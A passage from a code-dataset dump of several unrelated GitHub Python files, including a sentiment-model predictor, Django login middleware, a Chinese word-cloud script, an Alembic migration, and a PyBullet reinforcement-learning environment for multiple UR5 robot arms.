buffer.tobytes()\r\n\r\n yield (b'--frame\\r\\n'\r\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\r\n","repo_name":"TangHuiling/NKU_22","sub_path":"Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":8960,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40620838550","text":"import tensorflow as tf\nimport numpy as np\n\n\nclass TSPredictor:\n def __init__(self, model_path,vectorize_layer_path):\n self.model_path = model_path\n self.model = tf.keras.models.load_model(self.model_path)\n self.vectorize_layer_path = vectorize_layer_path\n self.loaded_vectorize_layer_model = tf.keras.models.load_model(self.vectorize_layer_path)\n \n def preprocess(self, raw_text):\n # Uses the trained vectorization layer to preprocess the text\n loaded_vectorize_layer = self.loaded_vectorize_layer_model.layers[-1]\n return loaded_vectorize_layer(raw_text)[np.newaxis, :] # Creates a new axis for batch size\n\n def infer(self, text):\n pred = self.model.predict(text)\n return {'output':pred.tolist()}\n\n\nif __name__ == \"__main__\":\n text = \"text\"\n file_path = \"./models/1/vectorize_layer\"\n model_path = \"./models/1/TSModel.hdf5\"\n predictor = TSPredictor(model_path,file_path)\n print(predictor.infer(predictor.preprocess(text)))\n","repo_name":"Marshall-mk/TweetsSentimentProject","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70017762407","text":"from django.conf import settings\nfrom django.shortcuts import redirect\nfrom django.utils.deprecation import MiddlewareMixin\nfrom django.utils import timezone\n\n\nclass LoginRequiredMiddleware(MiddlewareMixin):\n def process_request(self, request):\n\n exclude_paths = [\n '/logout/','/admin/','/admin/login/'\n ]\n\n if not request.user.is_authenticated:\n if not request.path == settings.LOGIN_URL:\n if request.path not in exclude_paths:\n return redirect(settings.LOGIN_URL)\n\n else:\n if request.path == settings.LOGIN_URL:\n return redirect(settings.INIT_URL)","repo_name":"Dandresfsoto/semaforos","sub_path":"web/semaforos/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7842604861","text":"import jieba, codecs, sys, pandas\nimport numpy as np\nfrom wordcloud import WordCloud\nfrom imageio import imread\nfrom wordcloud import WordCloud, ImageColorGenerator\nfrom os import listdir\nfrom os.path import isfile, join\nimport matplotlib.pyplot as plt\n\n#\n# Pour bien fonctionner, ce script a besoin de deux fichiers :\n# - un fichier .txt contenant les stopwords chinois\n# - un fichier .ttf contenant la police à utiliser\n#\n# Ces fichiers sont rangés dans un sous-dossier data/\n#\n#\n\n\n\nstopwords_filename = 'data/stopwords_zh.txt'\nfont_filename = 'data/simkai.ttf'\n\ndef contain_latin(txt):\n return ('a' in txt or 'b' in txt or 'c' in txt or 'd' in txt or 'e' in txt or 'f' in txt or 'g' in txt or 'h' in txt or 'i' in txt or 'j' in txt or 'k' in txt or 'l' in txt or 'm' in txt or 'n' in txt or 'o' in txt or 'p' in txt or 'q' in txt or 'r' in txt or 's' in txt or 't' in txt or 'u' in txt or 'v' in txt or 'w' in txt or 'x' in txt or 'y' in txt or 'z' in txt)\n\ndef filter_numbers(txt):\n \"\"\"\n Renvoie vrai si l'argument passé en paramètre est une chaîne de caractères\n constituée uniquement de chiffres et de longueur strictement supérieure à 4\n - renvoie False si la chaîne est une suite de chiffres de longueur > 4\n - True sinon\n\n But = ne garder que les nombres assimilables à des années, ou éventuellement\n des pourcentages\n \"\"\"\n if txt.isdigit() and len(txt) > 4:\n return False\n else:\n return True\n\ndef main(input_filename):\n content = '\\n'.join([line.strip()\n for line in codecs.open(input_filename, 'r', 'utf-8')\n if len(line.strip()) > 0])\n stopwords = set([line.strip()\n for line in codecs.open(stopwords_filename, 'r', 'utf-8')])\n\n segs = jieba.cut(content)\n words = []\n for seg in segs:\n word = seg.strip().lower()\n # nettoyage des mots indésirables\n if len(word) > 1 and word not in stopwords and not contain_latin(word) and filter_numbers(word) and word != '-%':\n words.append(word)\n\n words_df = pandas.DataFrame({'word':words})\n words_stat = words_df.groupby(by=['word'])['word'].agg(number=np.size)\n words_stat = words_stat.reset_index().sort_values(by=\"number\",ascending=False)\n\n print('# of different words =', len(words_stat))\n\n wordcloud = WordCloud(font_path=font_filename, max_font_size=50, random_state=100, max_words=100, background_color=\"white\")\n wordcloud = wordcloud.fit_words(dict(words_stat.head(4000).itertuples(index=False)))\n print(\"Sauvegarde du nuage\")\n wordcloud.to_file('nuage_chinois.png')\n\nif __name__ == '__main__':\n if len(sys.argv) == 2:\n main(sys.argv[1])\n else:\n print('[usage] <input>')\n","repo_name":"cbuontal/M1TAL_immigration","sub_path":"scripts/nuage_chinois.py","file_name":"nuage_chinois.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15696920729","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nfrom numpy import array, dot, shape, transpose\nfrom numpy.linalg import det, svd\n\n\ndef superpose(nodes1, nodes2, select1, select2):\n vecs1 = array(nodes1)[array(select1)]\n vecs2 = array(nodes2)[array(select2)]\n print(vecs1, vecs2)\n\n n_vec, vec_size = shape(vecs1)\n center1 = sum(vecs1, 0) / float(n_vec)\n center2 = sum(vecs2, 0) / float(n_vec)\n vecs1 -= center1\n vecs2 -= center2\n\n V, S, W_trans = svd(dot(transpose(vecs2), vecs1))\n\n is_reflection = (det(V) * det(W_trans)) < 0.0\n if is_reflection:\n V[-1, :] = V[-1, :] * (-1.0)\n\n optimal_rotation = dot(V, W_trans)\n return dot(array(nodes2) - center2, optimal_rotation) + center1\n\n# a = [ (1,1), (4,4), (1,4) ]\n# b = [ (0,3), (3,0), (3,3), (5,5) ]\n\n# print superpose(a, b, (0,1,2), (0,1,2))\n","repo_name":"RupaliBhati/Traffic-Light-Control-using-Reinforcement-Learning","sub_path":"tools/lib/rmsd.py","file_name":"rmsd.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"4493705459","text":"\"\"\"empty message\n\nRevision ID: fdd27ceacc26\nRevises: 452b89f3e9be\nCreate Date: 2020-08-26 20:59:21.462885\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fdd27ceacc26'\ndown_revision = '452b89f3e9be'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('back',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('uname', sa.String(length=10), nullable=True),\n sa.Column('backwords', sa.Text(), nullable=False),\n sa.Column('date', sa.Date(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('back')\n # ### end Alembic commands ###\n","repo_name":"xyj228/weibo","sub_path":"migrations/versions/fdd27ceacc26_.py","file_name":"fdd27ceacc26_.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41683410064","text":"from struct import *\nimport numpy as np\n# I considered using multiprocessing package, but I find this code version is fine.\n# Welcome for your version with multiprocessing to make the reading faster.\n# from joblib import Parallel, delayed\nimport multiprocessing\nimport time\nfrom scipy import misc\nimport os\nimport argparse\nfrom progressbar import ProgressBar\nfrom skimage.measure import block_reduce\n\n\ndef bin2array(file):\n start_time = time.time()\n with open(file, 'r') as f:\n float_size = 4\n uint_size = 4\n total_count = 0\n cor = f.read(float_size * 3)\n cors = unpack('fff', cor)\n # print(\"cors is {}\",cors)\n cam = f.read(float_size * 16)\n cams = unpack('ffffffffffffffff', cam)\n # print(\"cams %16f\",cams)\n vox = f.read()\n numC = len(vox) / uint_size\n # print('numC is {}'.format(numC))\n checkVoxValIter = unpack('I' * numC, vox)\n checkVoxVal = checkVoxValIter[0::2]\n checkVoxIter = checkVoxValIter[1::2]\n checkVox = [\n i for (val, repeat) in zip(checkVoxVal, checkVoxIter)\n for i in np.tile(val, repeat)\n ]\n # print('checkVox shape is {}'.format(len(checkVox)))\n checkVox = np.reshape(checkVox, (240, 144, 240))\n checkVox = block_reduce(checkVox, block_size=(3, 3, 3), func=np.max)\n f.close()\n # print \"reading voxel file takes {} mins\".format((time.time()-start_time)/60)\n return checkVox\n\n\ndef png2array(file):\n image = misc.imread(file)\n image = misc.imresize(image, 50)\n return image\n\n\nclass ScanFile(object):\n def __init__(self, directory, prefix=None, postfix='.bin'):\n self.directory = directory\n self.prefix = prefix\n self.postfix = postfix\n\n def scan_files(self):\n files_list = []\n\n for dirpath, dirnames, filenames in os.walk(self.directory):\n for special_file in filenames:\n if self.postfix:\n if special_file.endswith(self.postfix):\n files_list.append(os.path.join(dirpath, special_file))\n elif self.prefix:\n if special_file.startswith(self.prefix):\n files_list.append(os.path.join(dirpath, special_file))\n else:\n files_list.append(os.path.join(dirpath, special_file))\n\n return files_list\n\n def scan_subdir(self):\n subdir_list = []\n for dirpath, dirnames, files in os.walk(self.directory):\n subdir_list.append(dirpath)\n return subdir_list\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Parser added')\n parser.add_argument(\n '-s',\n action=\"store\",\n dest=\"dir_src\",\n default=\"/media/wangyida/D0-P1/database/SUNCGtrain_3001_5000\",\n help='folder of paired depth and voxel')\n parser.add_argument(\n '-td',\n action=\"store\",\n dest=\"dir_tar_depth\",\n default=\"/media/wangyida/D0-P1/database/SUNCGtrain_3001_5000_depvox\",\n help='for storing generated npy')\n parser.add_argument(\n '-tv',\n action=\"store\",\n dest=\"dir_tar_voxel\",\n default=\"/media/wangyida/D0-P1/database/SUNCGtrain_3001_5000_depvox\",\n help='for storing generated npy')\n parser.print_help()\n results = parser.parse_args()\n\n # folder of paired depth and voxel\n dir_src = results.dir_src\n # for storing generated npy\n dir_tar_depth = results.dir_tar_depth\n dir_tar_voxel = results.dir_tar_voxel\n\n # scan for depth files\n scan_png = ScanFile(directory=dir_src, postfix='.png')\n files_png = scan_png.scan_files()\n\n # scan for semantic voxel files\n scan_bin = ScanFile(directory=dir_src, postfix='.bin')\n files_bin = scan_bin.scan_files()\n\n # making directories\n try:\n os.stat(dir_tar_voxel)\n except:\n os.mkdir(dir_tar_voxel)\n try:\n os.stat(dir_tar_depth)\n except:\n os.mkdir(dir_tar_depth)\n\n pbar1 = ProgressBar()\n # save depth as npy files\n for file_png in pbar1(files_png):\n depth = png2array(file=file_png)\n name_start = int(file_png.rfind('/'))\n name_end = int(file_png.find('.', name_start))\n np.save(dir_tar_depth + file_png[name_start:name_end] + '.npy', depth)\n\n # save voxel as npy files\n pbar2 = ProgressBar()\n for file_bin in pbar2(files_bin):\n voxel = bin2array(file=file_bin)\n name_start = int(file_bin.rfind('/'))\n name_end = int(file_bin.find('.', name_start))\n np.save(dir_tar_voxel + file_bin[name_start:name_end] + '.npy', voxel)\n","repo_name":"wangyida/gan-depth-semantic3d","sub_path":"data/depthbin2npy.py","file_name":"depthbin2npy.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"53"} +{"seq_id":"3351827469","text":"import pybullet as p\nimport pybullet_data\nimport numpy as np\nfrom itertools import chain\nimport ray\nimport time\nimport torch\nimport traceback\nfrom .UR5 import UR5\nfrom .utils import (\n get_observation_dimensions,\n create_ur5s,\n pose_to_high_freq_pose,\n pos_to_high_freq_pos\n)\nfrom .tasks import TaskManager\nfrom policy import Memory\n\n\nclass BaseEnv:\n SIMULATION_TIMESTEP = 1.0 / 240.0\n\n def __init__(self, env_config, training_config, gui, logger):\n self.logger = logger\n self.setup(env_config, training_config, gui)\n self.task_manager = TaskManager(\n config={\n 'environment': env_config,\n 'training': training_config\n },\n task_loader=training_config['task_loader'],\n colors=[ur5.color for ur5 in self.all_ur5s])\n\n def setup_action_observation(self, observations_config):\n self.obs_key = [\n obs_item['name']\n for obs_item in observations_config['items']\n ]\n self.action_dim = UR5.joints_count\n\n self.observation_items = observations_config['items']\n observation_dim = get_observation_dimensions(observations_config)\n\n self.actor_observation_dim = observation_dim\n self.critic_observation_dim = observation_dim\n\n def set_memory_cluster_map(self, memory_cluster_map):\n self.memory_cluster_map = memory_cluster_map\n\n def setup(self, env_config, training_config, gui):\n self.action_interval = env_config[\"action_interval\"]\n self.episode_length = env_config[\"episode_length\"]\n self.simulation_steps_per_action_step = int(\n self.action_interval / BaseEnv.SIMULATION_TIMESTEP)\n self.episode_counts = 0\n self.action_type = 'delta'\\\n if 'action_type' not in env_config \\\n else env_config['action_type']\n self.observations = None\n self.gui = gui\n self.ray_id = None\n # Get variables from config\n self.max_ur5s_count = env_config['max_ur5s_count']\n self.max_task_ur5s_count = env_config['max_ur5s_count']\n self.min_task_ur5s_count = env_config['min_ur5s_count']\n self.survival_penalty = env_config['reward']['survival_penalty']\n self.workspace_radius = env_config['workspace_radius']\n self.individually_reach_target = \\\n env_config['reward']['individually_reach_target']\n self.collectively_reach_target = \\\n env_config['reward']['collectively_reach_target']\n self.cooperative_individual_reach_target = \\\n env_config['reward']['cooperative_individual_reach_target']\n self.collision_penalty = env_config['reward']['collision_penalty']\n proximity_config = env_config['reward']['proximity_penalty']\n self.proximity_penalty_distance = proximity_config['max_distance']\n self.proximity_penalty = proximity_config['penalty']\n self.delta_reward = env_config['reward']['delta']\n self.terminate_on_collectively_reach_target = env_config[\n 'terminate_on_collectively_reach_target']\n self.terminate_on_collision = env_config[\n 'terminate_on_collision']\n self.position_tolerance = env_config['position_tolerance']\n self.orientation_tolerance = env_config['orientation_tolerance']\n self.stop_ur5_after_reach = False\\\n if 'stop_ur5_after_reach' not in env_config \\\n else env_config['stop_ur5_after_reach']\n self.finish_task_in_episode = False\n self.centralized_policy = False \\\n if 'centralized_policy' not in training_config\\\n else training_config['centralized_policy']\n self.centralized_critic = False \\\n if 'centralized_critic' not in training_config\\\n else training_config['centralized_critic']\n\n self.curriculum = env_config['curriculum']\n self.retry_on_fail = env_config['retry_on_fail']\n self.failed_in_task = False\n self.task_manager = None\n self.episode_policy_instance_keys = None\n self.memory_cluster_map = {}\n self.collision_distance = \\\n env_config['collision_distance']\n self.curriculum_level = -1\n self.min_task_difficulty = 0.\n self.max_task_difficulty = 100.0\n if self.logger is not None:\n self.set_level(ray.get(self.logger.get_curriculum_level.remote()))\n\n self.expert_trajectory_threshold = 0.4\\\n if 'expert_trajectory_threshold' not in env_config\\\n else env_config['expert_trajectory_threshold']\n\n if self.gui:\n p.connect(p.GUI)\n else:\n p.connect(p.DIRECT)\n p.resetSimulation()\n p.setAdditionalSearchPath(pybullet_data.getDataPath())\n p.loadURDF(\"plane.urdf\",\n [0, 0, -self.collision_distance - 0.01])\n p.setRealTimeSimulation(0)\n p.setGravity(0, 0, -9.81)\n\n self.all_ur5s = [] # reference to all UR5's in scene\n self.ur5_episode_memories = None\n\n # Keep track of episode progress\n self.current_step = 0\n self.terminate_episode = False\n\n # Visualization\n if self.gui:\n self.real_time_debug = p.addUserDebugParameter(\n 'real-time', 0.0, 1.0, 1.0)\n self.viewer = None\n self.on_setup(env_config, training_config)\n self.setup_action_observation(training_config['observations'])\n self.setup_ur5s(env_config)\n\n def setup_ur5s(self, env_config):\n # Add UR5s\n if env_config['ur5s_position_picker'] == 'evenly_spaced':\n pass\n else:\n print(\"[BaseEnv]\" +\n \" Position Picker not supported: {}\".format(\n env_config['ur5s_position_picker']))\n exit(-1)\n self.all_ur5s = create_ur5s(\n radius=0.5,\n count=self.max_ur5s_count,\n speed=env_config['ur5_speed'])\n self.active_ur5s = []\n self.enable_ur5s()\n\n def disable_all_ur5s(self):\n for i, ur5 in enumerate(self.all_ur5s):\n ur5.disable(idx=i)\n self.active_ur5s = []\n\n def enable_ur5s(self, count=None):\n if count == len(self.active_ur5s):\n return\n self.disable_all_ur5s()\n for i, ur5 in enumerate(self.all_ur5s):\n if count is not None and i == count:\n break\n ur5.enable()\n self.active_ur5s.append(ur5)\n\n def reset_stats(self):\n self.stats = {\n # number of steps arm is collided in each episode\n \"collisions\": [0] * len(self.active_ur5s),\n # number of steps arm spends in reached state in each episode\n \"reached\": [0] * len(self.active_ur5s),\n \"collective_reach_count\": 0\n }\n\n def get_pose_residuals(self, poseA, poseB):\n posA = np.array(poseA[0])\n ornA = np.quaternion(*poseA[1])\n\n posB = np.array(poseB[0])\n ornB = np.quaternion(*poseB[1])\n\n pos_residual = np.linalg.norm(posA - posB)\n orn_residual = (ornA * ornB.inverse()).angle()\n # Get smallest positive angle\n orn_residual = orn_residual % (np.pi * 2)\n if orn_residual > np.pi:\n orn_residual = 2 * np.pi - orn_residual\n return pos_residual, orn_residual\n\n def get_ur5_eef_residuals(self):\n residuals = [self.get_pose_residuals(\n target_pose,\n ur5.get_end_effector_pose()\n ) for ur5, target_pose in zip(\n self.active_ur5s,\n self.task_manager.get_target_end_effector_poses()\n )]\n pos_residuals = np.array([res[0] for res in residuals])\n orn_residuals = np.array([res[1] for res in residuals])\n return pos_residuals, orn_residuals\n\n def check_ur5_reached_target(self, i, ur5, target_pose):\n pos_residual, orn_residual = self.get_pose_residuals(\n target_pose,\n ur5.get_end_effector_pose())\n reached_position = pos_residual < self.position_tolerance\n reached_orientation = orn_residual < self.orientation_tolerance\n reached = reached_position and reached_orientation\n if reached:\n self.on_target_reach(ur5, i)\n else:\n ur5.on_untouch_target()\n self.task_manager.targets_visuals[i].normal()\n return reached\n\n def get_state(self):\n \"\"\"\n Collect states of entire environment, and updates variables,\n such as whether or not to terminate episode\n \"\"\"\n colliding = any([ur5.check_collision() for ur5 in self.active_ur5s])\n if colliding:\n self.on_collision()\n self.state = {\n \"ur5s\": []\n }\n\n self.state['ur5s'] = [{\n 'end_effector_pose': ur5.get_end_effector_pose(),\n 'joint_values': ur5.get_arm_joint_values(),\n 'link_positions': ur5.get_link_global_positions(),\n 'ur5': ur5,\n 'pose': ur5.get_pose(),\n 'colliding': False if not colliding else ur5.check_collision(),\n 'target_pose': target_eef_pose,\n 'reached_target': self.check_ur5_reached_target(\n i, ur5, target_eef_pose),\n } for i, (ur5, target_eef_pose) in\n enumerate(zip(self.active_ur5s,\n self.task_manager.get_target_end_effector_poses()))]\n\n self.state['reach_count'] = sum([\n 1 if ur5_state['reached_target']\n else 0 for ur5_state in self.state['ur5s']])\n if self.state['reach_count'] == len(self.active_ur5s):\n self.on_all_ur5s_reach_target()\n\n return self.state\n\n def get_observations(self, state=None, limit=10):\n if state is None:\n state = self.get_state()\n if len(self.history) == 0:\n self.history = [state] * limit\n else:\n self.history.append(state)\n if len(self.history) > limit:\n del self.history[0]\n if self.centralized_policy:\n return [self.centralized_policy_get_observation(self.history)]\n else:\n return [self.get_observation(\n this_ur5=ur5,\n history=self.history)\n for ur5 in self.active_ur5s]\n\n def centralized_policy_get_observation(self, history):\n obs = {\n 'ur5s': []\n }\n for ur5_idx in range(len(self.active_ur5s)):\n obs['ur5s'].append({})\n for item in self.observation_items:\n key = item['name']\n val = None\n if key == 'link_positions':\n val = [list(chain.from_iterable(\n [np.array(link_pos)\n for link_pos in state['ur5s'][ur5_idx][key]]))\n for state in history[-(item['history'] + 1):]]\n elif key == 'end_effector_pose' \\\n or key == 'target_pose'\\\n or key == 'pose':\n val = [list(chain.from_iterable(\n state['ur5s'][ur5_idx][key]))\n for state in\n history[-(item['history'] + 1):]]\n else:\n val = [state['ur5s'][ur5_idx][key]\n for state in history[-(item['history'] + 1):]]\n obs['ur5s'][-1][key] = val\n return obs\n\n def get_observation(self, this_ur5, history):\n obs = {\n 'ur5s': [],\n }\n # Sequence Observation\n pos = np.array(this_ur5.get_pose()[0])\n sorted_ur5s = [ur5 for ur5 in self.active_ur5s\n if np.linalg.norm(\n pos - np.array(ur5.get_pose()[0]))\n < 2 * self.workspace_radius]\n # Sort by base distance, furthest to closest\n sorted_ur5s.sort(reverse=True, key=lambda ur5:\n np.linalg.norm(pos - np.array(ur5.get_pose()[0])))\n for ur5 in sorted_ur5s:\n obs['ur5s'].append({})\n ur5_idx = self.active_ur5s.index(ur5)\n for item in self.observation_items:\n key = item['name']\n val = None\n high_freq = 'high_freq' in key\n key = key.split('_high_freq')[0]\n if key == 'joint_values':\n val = [state['ur5s'][ur5_idx][key]\n for state in history[-(item['history'] + 1):]]\n elif 'link_positions' in key:\n # get flatten link positions in ur5's frame of reference\n val = [list(chain.from_iterable(\n [pos_to_high_freq_pos(this_ur5.global_to_ur5_frame(\n position=np.array(link_pos),\n rotation=None)[0])\n if high_freq else\n this_ur5.global_to_ur5_frame(\n position=np.array(link_pos),\n rotation=None)[0]\n for link_pos in state['ur5s'][ur5_idx][key]]))\n for state in history[-(item['history'] + 1):]]\n elif 'end_effector_pose' in key or \\\n 'target_pose' in key\\\n or key == 'pose' or key == 'pose_high_freq':\n val = [list(chain.from_iterable(\n pose_to_high_freq_pose(\n this_ur5.global_to_ur5_frame(\n position=state['ur5s'][ur5_idx][key][0],\n rotation=state['ur5s'][ur5_idx][key][1]))\n if high_freq else\n this_ur5.global_to_ur5_frame(\n position=state['ur5s'][ur5_idx][key][0],\n rotation=state['ur5s'][ur5_idx][key][1])))\n for state in history[-(item['history'] + 1):]]\n else:\n val = [pose_to_high_freq_pose(this_ur5.global_to_ur5_frame(\n state['ur5s'][ur5_idx][key]))\n if high_freq else\n this_ur5.global_to_ur5_frame(\n state['ur5s'][ur5_idx][key])\n for state in history[-(item['history'] + 1):]]\n obs['ur5s'][-1][key] = val\n return obs\n\n def get_rewards(self, state):\n current_ur5_ee_residuals = self.get_ur5_eef_residuals()\n if self.prev_ur5_ee_residuals is None:\n self.prev_ur5_ee_residuals = current_ur5_ee_residuals\n survival_penalties = np.array([\n (self.survival_penalty\n if not ur5_state['reached_target']\n else 0)\n for ur5_state in state['ur5s']\n ])\n\n collision_penalties = np.array([\n (self.collision_penalty if ur5_state['colliding'] else 0)\n for ur5_state in state['ur5s']\n ])\n\n if self.cooperative_individual_reach_target:\n individually_reached_target_rewards = np.array(\n [self.individually_reach_target * state['reach_count']\n for _ in range(len(self.active_ur5s))])\n else:\n individually_reached_target_rewards = np.array([\n (self.individually_reach_target\n if ur5_state['reached_target']\n else 0)\n for ur5_state in state['ur5s']\n ])\n # Only give delta rewards if ee is within a radius\n # away from the target ee\n delta_position_rewards = \\\n [(prev - curr) * self.delta_reward['position']\n if curr < self.delta_reward['activation_radius']\n else 0.0\n for curr, prev in zip(\n current_ur5_ee_residuals[0],\n self.prev_ur5_ee_residuals[0])]\n delta_orientation_rewards = \\\n [(prev - curr) * self.delta_reward['orientation']\n if curr_pos_res < self.delta_reward['activation_radius']\n else 0.0\n for curr, prev, curr_pos_res in zip(\n current_ur5_ee_residuals[1],\n self.prev_ur5_ee_residuals[1],\n current_ur5_ee_residuals[0])]\n # proximity penalty\n proximity_penalties = np.array([\n sum([(1 - closest_points_to_other[0][8]\n / self.proximity_penalty_distance)\n * self.proximity_penalty\n for closest_points_to_other in ur5.closest_points_to_others\n if len(closest_points_to_other) > 0 and\n closest_points_to_other[0][8] <\n self.proximity_penalty_distance])\n for ur5 in self.active_ur5s])\n\n collectively_reached_targets = (\n state['reach_count'] == len(self.active_ur5s))\n collective_reached_targets_rewards = np.array(\n [(self.collectively_reach_target\n if collectively_reached_targets\n else 0)\n for _ in range(len(self.active_ur5s))])\n self.prev_ur5_ee_residuals = current_ur5_ee_residuals\n ur5_rewards_sum = \\\n collision_penalties + individually_reached_target_rewards +\\\n collective_reached_targets_rewards + survival_penalties + \\\n proximity_penalties + \\\n delta_position_rewards + delta_orientation_rewards\n if self.centralized_policy:\n return np.array([ur5_rewards_sum.sum()])\n else:\n return ur5_rewards_sum\n\n def step_simulation(self):\n p.stepSimulation()\n\n def finish_up_step(self):\n pass\n\n def step(self, actions):\n if self.terminate_episode:\n return self.reset()\n self.current_step += 1\n rewards = np.zeros(len(self.ur5_episode_memories))\n self.handle_actions(actions)\n\n for t_sim in range(self.simulation_steps_per_action_step):\n p.stepSimulation()\n\n for ur5 in self.active_ur5s:\n ur5.step()\n\n self.state = self.get_state()\n rewards += self.get_rewards(self.state)\n\n self.on_step_simulation(\n self.current_step *\n self.simulation_steps_per_action_step + t_sim,\n self.episode_length * self.simulation_steps_per_action_step,\n self.state)\n\n if self.gui and \\\n p.readUserDebugParameter(self.real_time_debug) == 1.0:\n time.sleep(BaseEnv.SIMULATION_TIMESTEP)\n\n # Check if user wants to end current episode\n rKey = ord('r')\n keys = p.getKeyboardEvents()\n if rKey in keys and keys[rKey] & p.KEY_WAS_TRIGGERED:\n self.terminate_episode = True\n\n if self.terminate_episode:\n break\n\n # Check if ur5 reached target positions\n self.terminate_episode = self.terminate_episode\\\n or self.current_step >= self.episode_length\n\n self.finish_up_step()\n\n self.observations = [self.preprocess_obs(o)\n for o in self.get_observations(state=self.state)]\n\n self.episode_reward_sum += rewards\n\n for o, r, m in zip(\n self.observations,\n rewards,\n self.ur5_episode_memories):\n m.add_rewards_and_termination(r, self.terminate_episode)\n m.add_value('next_observations', o)\n if self.centralized_critic:\n critic_next_obs = []\n for obs in m.data['next_observations'][-1]:\n critic_next_obs.append(torch.cat((\n obs,\n torch.FloatTensor([0.]*6))))\n m.data['critic_next_observations'].append(\n torch.stack(critic_next_obs))\n if not self.terminate_episode:\n m.add_observation(o)\n\n if self.terminate_episode:\n self.on_episode_end()\n\n return self.obs_to_policy(self.observations), self.ray_id\n\n def obs_to_policy(self, obs):\n retval = {}\n for ob, policy_key in zip(obs, self.episode_policy_instance_keys):\n if policy_key not in retval:\n retval[policy_key] = []\n retval[policy_key].append(ob)\n return retval\n\n def send_memory_to_clusters(self):\n ray.get([\n self.memory_cluster_map[\n policy_instance_key].submit_memory.remote(memory)\n for memory, policy_instance_key in zip(\n self.ur5_episode_memories, self.episode_policy_instance_keys)])\n\n def get_stats_to_log(self):\n pos_residuals, orn_residuals = self.get_ur5_eef_residuals()\n return {\n 'rewards': np.mean(self.episode_reward_sum),\n 'individual_reach': np.mean(self.stats['reached']),\n 'collective_reach': np.mean(self.stats['collective_reach_count']),\n 'collision': np.mean(self.stats['collisions']) /\n (self.episode_length * self.simulation_steps_per_action_step),\n 'success': self.stats['collective_reach_count']\n if sum(self.stats['collisions']) == 0\n else 0,\n 'curriculum_level': self.curriculum_level,\n 'mean_pos_residual': pos_residuals.mean(),\n 'mean_orn_residual': orn_residuals.mean(),\n 'max_pos_residual': pos_residuals.max(),\n 'max_orn_residual': orn_residuals.max(),\n }\n\n def send_stats_to_logger(self):\n if self.logger is not None:\n logger_curriculum_level = ray.get(self.logger.add_stats.remote(\n self.get_stats_to_log()))\n self.set_level(logger_curriculum_level)\n\n def on_success(self):\n self.task_manager.on_success()\n\n def on_episode_end(self):\n success = self.stats['collective_reach_count']\\\n if sum(self.stats['collisions']) == 0\\\n else 0\n if success != 0:\n self.on_success()\n self.failed_in_task = \\\n self.stats['collective_reach_count'] == 0\\\n or sum(self.stats['collisions']) != 0\n self.send_memory_to_clusters()\n self.send_stats_to_logger()\n\n def reset_memories(self):\n self.ur5_episode_memories = [\n Memory(memory_field)\n for memory_field in self.get_memory_fields()]\n\n def get_memory_fields(self):\n memory_fields = []\n for policy_key in self.episode_policy_instance_keys:\n if self.memory_cluster_map[policy_key] is None:\n memory_fields.append([])\n else:\n memory_fields.append(\n ray.get(\n self.memory_cluster_map[policy_key]\n .get_memory_fields.remote()))\n return memory_fields\n\n def reset(self):\n self.history = []\n self.current_step = 0\n self.episode_counts += 1\n self.finish_task_in_episode = False\n self.setup_task()\n self.reset_memories()\n self.reset_stats()\n self.prev_ur5_ee_residuals = None\n self.on_reset()\n self.episode_reward_sum = np.zeros(len(self.ur5_episode_memories))\n for _ in range(50):\n p.stepSimulation()\n self.observations = [self.preprocess_obs(o)\n for o in self.get_observations()]\n assert len(self.observations) == len(self.ur5_episode_memories)\n for o, m in zip(self.observations, self.ur5_episode_memories):\n m.add_observation(o)\n\n self.terminate_episode = False\n return self.obs_to_policy(self.observations), self.ray_id\n\n def should_get_next_task(self):\n if not self.retry_on_fail:\n return True\n elif not self.failed_in_task:\n return True\n # Only retry failed task if\n # graduate from final curriculum level a while ago\n return False\n\n def get_current_task(self):\n return self.task_manager.current_task\n\n def setup_task(self):\n if self.should_get_next_task() and self.task_manager is not None:\n self.task_manager.setup_next_task(\n max_task_ur5s_count=self.max_task_ur5s_count,\n min_task_ur5s_count=self.min_task_ur5s_count,\n max_task_difficulty=self.max_task_difficulty,\n min_task_difficulty=self.min_task_difficulty)\n self.enable_ur5s(count=self.get_current_task().ur5_count)\n for ur5, ur5_task in zip(self.active_ur5s,\n self.get_current_task()):\n ur5.set_pose(ur5_task['base_pose'])\n ur5.set_arm_joints(ur5_task['start_config'])\n ur5.step()\n assert len(self.memory_cluster_map) == 1\n num_policies = 1 if self.centralized_policy else len(self.active_ur5s)\n self.episode_policy_instance_keys = [\n key for key in self.memory_cluster_map] * num_policies\n\n def handle_actions(self, actions):\n if self.stop_ur5_after_reach:\n for i, (action, ur5, target_eef_pose) in enumerate(\n zip(actions,\n self.active_ur5s,\n self.task_manager.get_target_end_effector_poses())):\n if self.check_ur5_reached_target(i, ur5, target_eef_pose):\n action = np.zeros(6)\n if self.centralized_policy:\n actions = actions[0]\n self.ur5_episode_memories[0].add_action(actions)\n actions = list(torch.split(actions, 6))\n else:\n for action, m in zip(actions, 